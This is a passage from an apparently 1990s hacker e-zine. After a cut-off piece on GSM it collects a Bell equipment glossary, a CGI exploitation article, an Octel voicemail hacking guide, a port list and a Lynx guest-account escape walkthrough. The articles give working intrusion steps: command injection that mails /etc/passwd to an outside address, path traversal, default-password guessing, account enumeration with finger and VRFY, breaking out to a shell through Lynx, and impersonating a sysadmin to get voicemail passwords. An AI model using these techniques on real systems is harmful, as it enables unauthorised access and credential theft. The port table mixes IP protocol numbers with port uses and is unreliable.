schemes as a compromise between spectral efficiency, complexity of the transmitter, and limited
spurious emissions. The complexity of the transmitter is related to power consumption, which should
be minimized for the mobile station. The spurious radio emissions, outside of the allotted bandwidth,
must be strictly controlled so as to limit adjacent channel interference, and allow for the co-existence
of GSM and the older analog systems (at least for the time being).
4.4 Multipath equalization
At the 900 MHz range, radio waves bounce off everything - buildings, hills, cars, airplanes, etc.
Thus many reflected signals, each with a different phase, can reach an antenna. Equalization is used
to extract the desired signal from the unwanted reflections. Equalization works by finding out how a
known transmitted signal is modified by multipath fading, and constructing an inverse filter to extract
the rest of the desired signal. This known signal is the 26-bit training sequence transmitted in the
middle of every time slot burst. The actual implementation of the equalizer is not specified in the
GSM specifications.
*Due To the Intense Length Of this Article It Has Been Broken Into 3 Parts Part 2 will Be
Posted in NPA2*
:"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""":
: EQUIBELL-ALT P DICTIONARY :
: :
: by :
: _ __ __ ____ :
: | |/ / / \ | ___ :
: | / | | | |__ | :
: | \ | | | __| | :
: |_|\_\ \__/ |____| :
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
INTRODUCTION
------------
I always wished, and always will that I would have the pleasure to own
all the bell equipment. And so I decided that I would make a checklist of all
the equipment that I knew of, well then the thought came to mind, I bet every-
one else would enjoy it do. So here is a dictionary of all Bell equip that I
know of, if I missed something find me on dal.net in #npa, #phreaks, or where-
ever I am.
DICTIONARY
----------
Bell 11mm, 3/8= A single driver, an 11mm on one end and a 3/8 on the opposite
Bell Blue= Scematic blue prints of a specific areas' wiring system
Bell Emitter= A box that emits signals for the Bell Wireless Tester, it is a
tester, for the tester.
Bell Hard-Hat= Ummm... let me think...
Bell Hex= An allen wrench that has a hole drilled in the center.
Bell Lap= A piece of crap with a 1200 kbps and shit mem. Contains Bell 800
bbs #'s and other useless programs.
Bell Tester= Uses light too represent voltages, 10-12, 0, 48, etc.. Has
modular and clips.
Bell Thing= A large steel piece of equip which conects pieces of plastic
holding copper wires in the center (between the 2 plastic things)
___________________________
| |
|***************************|
|___________________________|
(cont..) there by keeping the wires with there group & reducing "Jumbbled Up"
wiring.
Bell Wirerless Tester: Uses tones to represent voltage.
DRACON: A Bell linemans hand set with attached Beige. Some dracons contain 4
extra buttons, rcl, snd, ect... Name recived due to the fact that they are
made by the Harris Dracon Co.
___
FILE WROTE BY: Kosmos, for, |\ | | \ |\ AMD FOR EVERYONE THAT WISHES TO
| \ | |___/ |_\ LEARN.
| \| | | \
REMEMBER, if I left somthing out, no matter what it is, find me and tell me.
Advanced CGI Exploitation Techniques
By: IsolationX
Common Gateway Interface (cgi) is a type of scripting language. Cgi is not its "own" language, it is a combination of perl, C, and shell commands. Cgi scripts are normaly stored in the /cgi-bin/ directory, this directory is exacutable via http. When there is not a /cgi-bin/ directory it is normaly due to the admin changing the location of where the scripts are held or the server does not support cgi. Cgi is commenly used for webpages but it can be used for many more types of things. Since cgi is very commen it will, of course, produce major security flaws. These flaws are normaly do to a amature scripter who knows very little about cgi and the security aspects of it. Thus I have decided to write a indepth artical on cgi security and the ways to exploit it. Lets begin.
Lets say you stumble onto Ms. Marry's webpage and it contains the following form...
This is a simple form that asks the user to input a message, which is sent to a script called form1.pl. Lets say that in the source of this script contains the following line (assume that the variables have already been parsed out of the input stream)....
system("/usr/lib/sendmail -t $myaddress < $tempfile")
This puts what the user has entered into a temp file, then e-mails it to Ms. Marry. Consider what you can do with this script. Here is one way you could do exploit it http...
I have just demenstrated a 'system call hole'. The "system" call in perl, spawns a Unix shell and, in this case, exacutes the commands in the 'value' field, mailing the passwd file to hacker@host.com. Just for refernece, the semicolons in the 'hidden value' field act as delimiters, which separate the commands.
Any cgi system call is inherently exploitable if not correctly coded (which it rearely is). Consider the following line of code within a cgi script...
print `/usr/local/bin/finger $userinput`;
This could be taken advantage of by using the same type of maliciuos input as before. In genral if any of the following characters are included in a system call it is most likely exploitable in some means.
; > < & * ` | $ #
Anyway, enough on system calls, lets move on.
Opening a file on a system remotely is always a plus for the hacker, so let me show you a quick example of how to get read access to a most any file on a system by exploiting a small script. Say that you are writing a script that stores a message based on the username of the user entering it, and you add the following line to your script...
open(FILE,"> /usr/local/message/data/$username");
Well what if the user was to type in ../../../../etc/passwd as his username? You would, ofcourse, get read access to /etc/passwd. Simple enough but very affective, need I say more...?
A good trick to know off hand is to subvert the systems variables to point to a trojan horse in another directory. Here is a quick and pretty straight forward line of code that is volnurable to this type of atack...
system("finger $untained_user");
Now I have been talking about the code for the cgi scripts and you are probaly thinking well how the hell am I going to get the code for custom scripts in the first placeLets say that Mr. Johnson just wrote a cgi script in EMACS or a simamler type of editor. Well when you write cgi scipt in one of those types of editors it automaticaly creates a backup of the file with the extention of ~. Now that you know this (I hope you did know this before now) you can sometimes stuble apon the source of custom cgi scripts and check them for voulnerbilitys.
Before I go let me say, allways watch for scripts that query a file on the remote system... It can be used to view files on that system (e.x. /etx/passwd or /etc/shadow). A example of this is the infamouse 'phf' bug. Anyway Keep it together.
Be Cool,
IsolationX
D. Operating Guide For Octel Voice Mail Systems
--------------------------------------------
Written By: De-Format
Ok... lots of companys use Octel as thier voice mail OS... and it's
pretty basic to operate. But there's some things within Octel that aren't
well known of. This file was written mainly for people who are just
experimenting in the voice mail field, or who wish to persue into it, and are
just starting. However, some "veteran" VMB hackers may wish to read this
also, it's all you really need to know about Octel.
Table Of Contents
-----------------
1) How you know you have an Octel VMB system.
2) The complete list of Octel commands.
3) Further explanation of selected Octel options.
4) General tips.
5) How you can reach Octel.
1) How you know you have an Octel VMB system.
---------------------------------------------
Most companys only put up there 1-800 VMB system after work hours, but
sometimes you'll get lucky and come across an automated system thats up 24
hours a day. So you call the 1-800 number, once you hear the greeting, press
the # key. If you get some bitchy voice saying "Please Enter Your Mailbox
Number", then you've probably got an Octel. (You'll recognize the voice from
other places) Now it's all upto you. There's a million and one ways you
can get someone's mailbox number and sometimes even their password. Phone up
during business hours and get connected to some company worker, tell them your
the sysadmin and tell them the voice mail system had some sort of crash, or
start asking them question about the company and tell them you want to leave
them a message. (Get their box and your all set, you just have to hope they
have a default pw, or you can scan a bunch of nums until you find some un-used
boxes).
2) The complete list of Octel commands.
---------------------------------------
==============================================================================
Phone the 1-800 number.
Get the intro prompt.
Press #.
Enter mailbox number.
Enter password.
==============================================================================
Check unheard messages press 11.
Review saved messages press 1.
Send a message press 2.
Check receipt press 3.
Personal options press 4.
Restart press 5.
Exit press *.
==============================================================================
If you pressed 1 you go on to these options while listening to the message(s).
Position: Rewind-1, Pause/Restart-2, Fast Forward-3.
Speed: Slower-4, Envelope-5, Faster-6.
Volume: Normal-8, Louder-9.
To cancel press *.
For help press 0.
To skip press #.
==============================================================================
After the message you have these options.
To replay press 4.
For the envelope press 5.
To forward a copy to another destination press 6.
To erase the message press 7.
To reply to the message, press 8.
To save the message, press 9.
To return to the main menu press *.
==============================================================================
If you pressed 2 you go onto these options after you recorded your message.
To reply the message, press 1.
If you are finished recording, press #.
Enter the destination of the message, or spell a name by pressing #.
==============================================================================
Once your destination is entered, you have these extra options.
To mark the message private press 1.
To mark the message urgent press 2.
For message recieved confirmation, press 3.
Future delivery press 4.
==============================================================================
Even more options after the ones directly above include.
To send, press #.
No more destinations, press *.
To confirm receipt, press 1.
To notify of non-receipt, press 2.
==============================================================================
If you press 3 you go onto this option.
Enter mailbox number or press # to spell the name.
==============================================================================
If you press 4 you get these personal options.
To turn notification ON/OFF press 1.
For administrative options, press 2.
For greetings press 3.
Notification schedule, press 4.
Mailbox forwarding, press 5.
Security options press 6.
==============================================================================
If you pressed 2 at the personal options menu, you will be at the admin menu.
Passwords press 1.
Group lists press 2.
Prompt levels press 3.
Date & time playback, press 4.
==============================================================================
If you press 1 at the admin options, these are your options.
Guest 1 (mailbox 91) press 1.
Guest 2 (mailbox 92) press 2.
Home (mailbox 93) press 3.
Secretary press 4.
Personal press 5.
==============================================================================
If you press 2 at the admin options, these are your options.
Create a group list, press 1.
Edit a group list, press 2.
Delete a group list, press 3.
List names, press 4.
==============================================================================
If you press 3 at the admin options, these are your options.
Standard prompt levels, press 1.
Extended prompt levels, press 2.
Rapid prompt levels, press 3.
==============================================================================
If you press 3 at the personal options menu, these are your options.
Personal greeting, press 1.
Exteneded absence, press 2
Name, press 3.
==============================================================================
If you press 4 at the personal options menu, these are your options.
1st schedule notification, press 1.
2nd schedule notification, press 2.
Temporary notification, press 3.
==============================================================================
If you press 5 at the personal options menu, these are your options.
To establish or change forwarding destination, press 1.
To cancel forwarding destination, press 2.
==============================================================================
If you press 6 at the personal options menu, these are your options.
To turn on access security press 1.
To turn off access security press 2.
To hear the tutorial press 0.
==============================================================================
3) Further explanation of selected Octel commands.
--------------------------------------------------
Envelope Information: When your listening to a message, or after it ends, you
can obtain envelope info. If the message sender is a subscriber, you can
hear the sender's name. (If the person is not on the Octel system you'll be
told the message was left by an outside caller.) You'll also be told of the
time and date the message was sent at, how long it is and whether it's urgent
and/or private. If your listening to an archived (saved) message, the time
refers to when the message was archived, or sent... it all depends on how the
system is set up. If you get envelope info during the message, the message
will continue where you left off when the envelope info is done.
==============================================================================
Passwords: Your password can be up to 15 digits long. The sysadmin (whose
account you may be able to acquire) decides on the minimal digits for a
password. Passwords must be different on all your boxes. (Example... if your
password was 5555 then your password on one of your guest boxes can't be 5555)
If you want to find out the current password being used on a box, press 0
immediately after you identify the type of password to be changed.
You can have two guest passwords, and therefore two guest mailboxes, as you
already knew. You can give a guest mailbox to someone who doesn't have a
legit box but you keep in touch with a lot. (You also have control over the
guest box so, well, if at some time you want to break the lines of
communication that the person of the guest mailbox uses, you can) Guests can
only hear messages that you send them. Thats not fair is it? If you change
the password on a guest mailbox, all messages still in the box are erased.
Not even the system administrator can get your password. If you forgot it,
then your pretyt much screwed cause you have to have your mailbox reset and
well, if you go asking he's going to wonder where in the world you came from.
If you give someone a guest password they must call the system telephone
number, press #, enter your mailbox number and enter the password that allows
entry into his/her portion of your mailbox.
==============================================================================
Group Distribution Lists: Group lists are ok to have if you "obtain" a large
number of boxes on the system and decide to be nice and give them to friends,
otherwise this option is just plain useless.
==============================================================================
Notification Schedule: The notification schedule is kinda cool. You can have
the system call you at any specified time frame once you recieve messages.
You can even set up different time schedules for different portions of the
week/night/day. Depending on where you live, the system may/may not be able
to call you, it's whatever the sysadmin set it at, but if you can get his/her
account, then your set.
==============================================================================
Access Security: This option is nice to have, but if you have the IQ of a
watermelon you won't need it. This option is somewhat a pain in the ass also.
You have to record your name and time of day. Next time you logon it will
tell you who was last on. (If the name isn't your's then you might want to
sit down and think long and hard about the positive aspects of watermelons).
If you hear silence for the name and time, or the following prompt: "The last
mailbox access was by recorded name and time skipped." then you just might
want to change your password to something a watermelon couldn't guess, because
if you do hear that then chances are someone was in on your account.
==============================================================================
4) General tips.
----------------
- If your placing a call to the system with a AT&T calling card/calling card
number, then be sure not to hit # too quickly. This may indicate to AT&T
that you want to place another calling card call. Wait until the system's
intro prompt is done. You can also press * to enter the system as a
subscriber.
- Thats about the only tip there is... everything else should be fine.
5) How you can reach Octel.
---------------------------
On the phone: 1-800-87-OCTEL
Snail Mail: Octel Communications Corporation
1001 Murphy Ranch Road
Milpitas, California USA 95035-7912
On the web: www.octel.com
E.
My unix port hand book
Unix Ports
by (\/)@ster Y0d@
Decimal Keyword Protocol
------- ------- --------
0 Reserved
1 ICMP Internet Control Message
2 IGMP Internet Group Management
3 GGP Gateway-to-Gateway
4 IP IP in IP (encasulation)
5 ST Stream
6 TCP Transmission Control
7 UCL UCL
8 EGP Exterior Gateway Protocol
9 IGP any private interior gateway
10 BBN-RCC-MON BBN RCC Monitoring
11 NVP-II Gives you info on all the users in the system
12 PUP PUP
13 ARGUS Daytime and date a location
14 EMCON EMCON
15 XNET Cross Net Debugger
16 CHAOS Chaos
17 UDP User Datagram
18 MUX Multiplexing
19 DCN-MEAS DCN Measurement Subsystems
20 HMP Host Monitoring
21 PRM Transfer files
22 XNS-IDP XEROX NS IDP
23 TRUNK-1 Telnet login
24 TRUNK-2 Trunk-2
25 LEAF-1 Send mail port
26 LEAF-2 Leaf-2
27 RDP Reliable Data Protocol
28 IRTP Internet Reliable Transaction
29 ISO-TP4 ISO Transport Protocol Class 4
30 NETBLT Bulk Data Transfer Protocol
31 MFE-NSP MFE Network Services Protocol
32 MERIT-INP MERIT Internodal Protocol
33 SEP Sequential Exchange Protocol
34 3PC Third Party Connect Protocol
35 IDPR Inter-Domain Policy Routing Protocol
36 XTP XTP
37 DDP Datagram Delivery Protocol,Time!
38 IDPR-CMTP IDPR Control Message Transport Proto
39 TP++ TP++ Transport Protocol ,Resouce Location too
40 IL IL Transport Protocol
41 SIP Simple Internet Protocol
42 SDRP Source Demand Routing Protocol
43 SIP-SR Info on hosts and networks
44 SIP-FRAG SIP Fragment
45 IDRP Inter-Domain Routing Protocol
46 RSVP Reservation Protocol
47 GRE General Routing Encapsulation
48 MHRP Mobile Host Routing Protocol
49 BNA BNA
50 SIPP-ESP SIPP Encap Security Payload
51 SIPP-AH SIPP Authentication Header
52 I-NLSP Integrated Net Layer Security
53 SWIPE IP with Encryption , Also Name Server
54 NHRP NBMA Next Hop Resolution Protocol
55-60 Unassigned
61 any host internal protocol
62 CFTP CFTP
63 any local network
64 SAT-EXPAK SATNET and Backroom EXPAK
65 KRYPTOLAN Kryptolan
66 RVD MIT Remote Virtual Disk Protocol
67 IPPC Internet Pluribus Packet Core
68 any distributed file system
69 SAT-MON SATNET Monitoring
70 GOPHER VISA Protocol ,Out of Date info hunter
71 IPCV Internet Packet Core Utility
72 CPNX Computer Protocol Network Executive
73 CPHB Computer Protocol Heart Beat
74 WSN Wang Span Network
75 PVP Packet Video Protocol
76 BR-SAT-MON Backroom SATNET Monitoring
77 SUN-ND SUN ND PROTOCOL-Temporary
78 WB-MON WIDEBAND Monitoring
79 WB-EXPAK WIDEBAND EXPAK, lots of info on users
80 ISO-IP ISO Internet Protocol, web server
81 VMTP VMTP
82 SECURE-VMTP SECURE-VMTP
83 VINES VINES
84 TTP TTP
85 NSFNET-IGP NSFNET-IGP
86 DGP Dissimilar Gateway Protocol
87 TCF TCF
88 IGRP IGRP
89 OSPFIGP OSPFIGP
90 Sprite-RPC Sprite RPC Protocol
91 LARP Locus Address Resolution Protocol
92 MTP Multicast Transport Protocol
93 AX.25 AX.25 Frames
94 IPIP IP-within-IP Encapsulation Protocol
95 MICP Mobile Internetworking Control Pro.
96 SCC-SP Semaphore Communications Sec. Pro.
97 ETHERIP Ethernet-within-IP Encapsulation
98 ENCAP Encapsulation Header
99 any private encryption scheme
100 GMTP GMTP
110 POP Incoming E-mail
111-254 Unassigned
255 Reserved
443 SHTP Another web server
512 BIFF Mail Notification
513 RLOGIN Remote login
520 ROUTE Routing information protocol
The port information is this file is derived from the RFC standards.
If you liked this file send your comments to mastyoda@concentric.net
if you hated this and though it was stupid send it to my dev/null.
The info in the text is very useful to any hacker, elite of not,
everyone needs to port surf. Port Surfers will lover me for doing this.
(\/)@ster Y0d@
F.
------[ Using a Guest Lynx Account to Your Advantage]----------------
******************* by Electric Nectar*****************
----------
Situation:
----------
Ok so you're trying to get a valid account on a server for whatever
reasons. (busting root, taking a look around, etc.) You've tried telneting
to port 79, 25, and got a couple valid accounts, and have tried hopelessly
to just guess the passwords. This is not the approach to take.
-----------------
Method of attack:
-----------------
Throughout my experience, while trying to gain a valid account on
various servers, I've run into many that run a guest lynx account.
The purpose of this account is just what it sounds like, it gives no access
to the server itself, but rather let's you only run lynx (a unix-based, text only,
web browser). The account is designed to be accessed by outsiders. The most
common lynx login's and passwords are:
-lynx/lynx
-guest/guest
-guest/lynx
-www/wwww
-www/lynx
Ok well I think you get the idea, be creative if one doesn's work.
First off though, you need to make sure the account exists. Simply telnet
to port 79, and try typing in a possible lynx account name. If it varifies it
your set. Now if 79 isn't open, just telnet to port 25, and type
'vrfy username'; username being the name of a guest lynx account. This too
will varify the account. Here's an example...
Finger:
Trying...
Connected to host.com
Escape character is '^]'.
lynx
Login name: lynx In real life: Lynx Guest Account
Directory: /home/lynx Shell: /usr/bin/lynx
No Plan.
Smtp:
Trying...
Connected to host.com
Escape character is '^]'.
220 host.com ESMTP Sendmail 8.8.5/8.8.2; Fri, 3 Oct 1997 19:53:40 - 0400
vrfy lynx
252
-------------------
After varification:
-------------------
Now remember, a lynx guest account isn't a common thing on most
servers, although I have seen it on quite a few. This is just an alternate
plan of getting a shell on an otherwise, unaccessable server, if the situation
exists. If you cannot validate a guest lynx account, don't be surprised.
Next order of business is to login of course. It should be fairly
simple. Since it is a guest lynx account, the login and password should be
somewhat obvious, usually the password is the same as the login....
$ telnet host.com
Trying...
Connected to host.com
Escape character is '^]'.
Linux 2.0.29 (host.com) (ttyp0)
Welcome to Linux 2.0.29.
host login: lynx
Password:
Linux 2.0.29.
Last login: Fri Oct 3 17:11:59 on ttyp0 from ppp1.host.com
You have new mail.
---------------
Once logged in:
---------------
Ok, your terminal should look something like this...
----------------------------------------------------------------------
Lynx
(default page crap here)
_________________________________________________________________
-- press space for next page --
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
-----------------------------------------------------------------------------
Now the following trick is something I developed after several
minutes of devising a plan to make lynx pop me into a bash shell. Now that you
are in lynx, hit 'O' for the options menu. Ok the options menu should come up,
let's take a look at it...
-----------------------------------------------------------------------------
Options Menu (Lynx Version 2.6)
E)ditor : NONE
D)ISPLAY variable : NONE
B)ookmark file : lynx_bookmarks.html
F)TP sort criteria : By Filename
P)ersonal mail address : NONE
S)earching type : CASE INSENSITIVE
display (C)haracter set : ISO Latin 1
Raw 8-bit or CJK m(O)de : ON
preferred document lan(G)uage: en
preferred document c(H)arset : NONE
V)I keys : OFF
e(M)acs keys : OFF
K)eypad mode : Numbers act as arrows
li(N)e edit style : Default Binding
l(I)st directory style : Mixed style
sho(W) dot files : OFF
U)ser mode : Novice
user (A)gent : Lynx/2.6 libwww-FM/2.14
Select capital letter of option line, '>' to save, or 'r' to return to Lynx.
-----------------------------------------------------------------------------
Notice the E)ditor option. That's what we're after. The purpose of it
is to edit the file currently open in lynx with the supplied text editor. Lynx
usually expects you to put in something like joe, pico, vi, etc. But we can
supply anything we want, and it will use it with the syntax:
[editor]
Ok, here's where we get inovative. Hit 'E' to type in an editor.
For the editor, type: exec. Ah yes, those of experience are now starting to
nod their heads. Now hit 'shift+period key' or '>' to save the options. You
now return to the default screen. Next step. Hit 'g'. You will be prompted
to enter a URL. For the URL put the following:
file://localhost/bin/sh
If all goes according to plan, /bin/sh will open as binary garbage
in lynx. Now, normally if you hit 'e' with a default text editor set in
the options menu, it would edit /bin/sh as a text file. But thanks to our
little exec fix, it will now exec /bin/sh. And we all know what that does:
pops us into a bash shell! Here's an example of the act in progress...
-----------------------------------------------------------------------------
ELF4ð?4 (444 ÔÔÔéééyyÌH¬[Ä1ÄÁÄÁ/lib/ld-linux.so.1j5H[&mU dao Qx")Bs|Ng8LW+ST
eP{ut!i:@%`Mb9Aq7>=.~ZGFY/OôÃ]ØPc¸ÂToh"w"~È&"`ÂTè("X& è$«H@³ ÃT¾h"Åø"ÌØ"Ô&"Ûø"ä
("íØG"öØbýxWx<"x<¨Ì(F*l0j98tBK\ÂRÃ_T§ñÿfTÂñÿmTÂñÿy4Õñÿlibtermcap.so.2strcpyioct
ltgetnum_DYNAMICtgotogetenv__strtol_internalfgetsmemcpymalloctgetflag__environB
C_initwritestrcattputsstrncmpstrncpyreallocPCfopenfclosetgetent_finiatexit_GLOB
AL_OFFSET_TABLE_exitUPstrchrtgetstrfreelibc.so.5__ctype_b__ctype_tolower__ctype
_toupperbzerostrcmpgetpid_xstatgetcwdgetwdstrerrorfcntl_fxstatstrrchrenvironfnm
atchgeteuidgetuidgetgidgetegidkillpgtcflowtcgetpgrptcsetattrtcsetpgrpopensigact
ionsigaddsetsigprocmaskalarmclosegetdtablesizelongjmp__setjmpsigdelsetatoiatolq
sortbcopystrncatgethostnameisattytcgetattrsys_siglistwaitpidgetpeername_lxstate
rrnoclosediropendirreaddirreadaccesschdirdupdup2execveforkgetgroupsgetppidkilll
seekpipesetgidsetuidtimesumaskunlinkgetpgrpgetrlimitsetpgidsetrlimittime__setfp
-- press space for next page --
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
bash$ O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
-----------------------------------------------------------------------------
If you look in the very bottom left corner you will see it! (bash$)
A simple 'clear' command will get rid of the rest of that mess. Often times the
TERM setting will be all messed up. Simply fix that by typing:
TERM=vt100 export TERM
And there you have it folks, a bash shell popped off of a lynx guest
account. Now feel free to look around, run a few exploits, whatever, what you
do beyond here is totally up to you. Hope you enjoyed today's little lesson,
and I hope you get a chance to put it to work sometime. Take it easy all.
---------[End]---------------------------------------------------------------
----------------------------------------------------------------------
URL OF THE MONTH
BBM.DYN.ML.ORG
Title: The Blue Box Moon
Author: Delphian Q
The Blue Box Moon, What a glorious Site. Not only does this site provide A WEALTH of
Information but it has something to fit everyone. I have spoken to the author of this
page who is a very Moral and Respectable person. Delphain is a person That is to be
respected at all times, so if you ever see him on IRC please dont fuck with him.
this section is especially dedicated to him. Thank you for all the help you have
provided DelphianQ.
SKaLaR109 NPA/97
Closing Ceremonies
_________________________________
Well thats it for this one. I'd like to say thanks to all who
wrote, helped or annoyed me. Just like to say thanks to SKaLaR109 for not
killing me for being so late with this, and Aardwolf for reminding me
to get this thing done.
So...
__ _ _______ __
/| \ /| | /| _____ | /| \
| | \| | | | | |___/ | | | \
| | |\ \ | | | | _____/ | | |\ \
| | | \ \| | | | |___/ | | _ \
| | |\ \ | | | | | | | \ \
| |_| \ \__| | |_| | |_|\ \__\
|/__/ \/__/ |/__/ |/__/ \/__/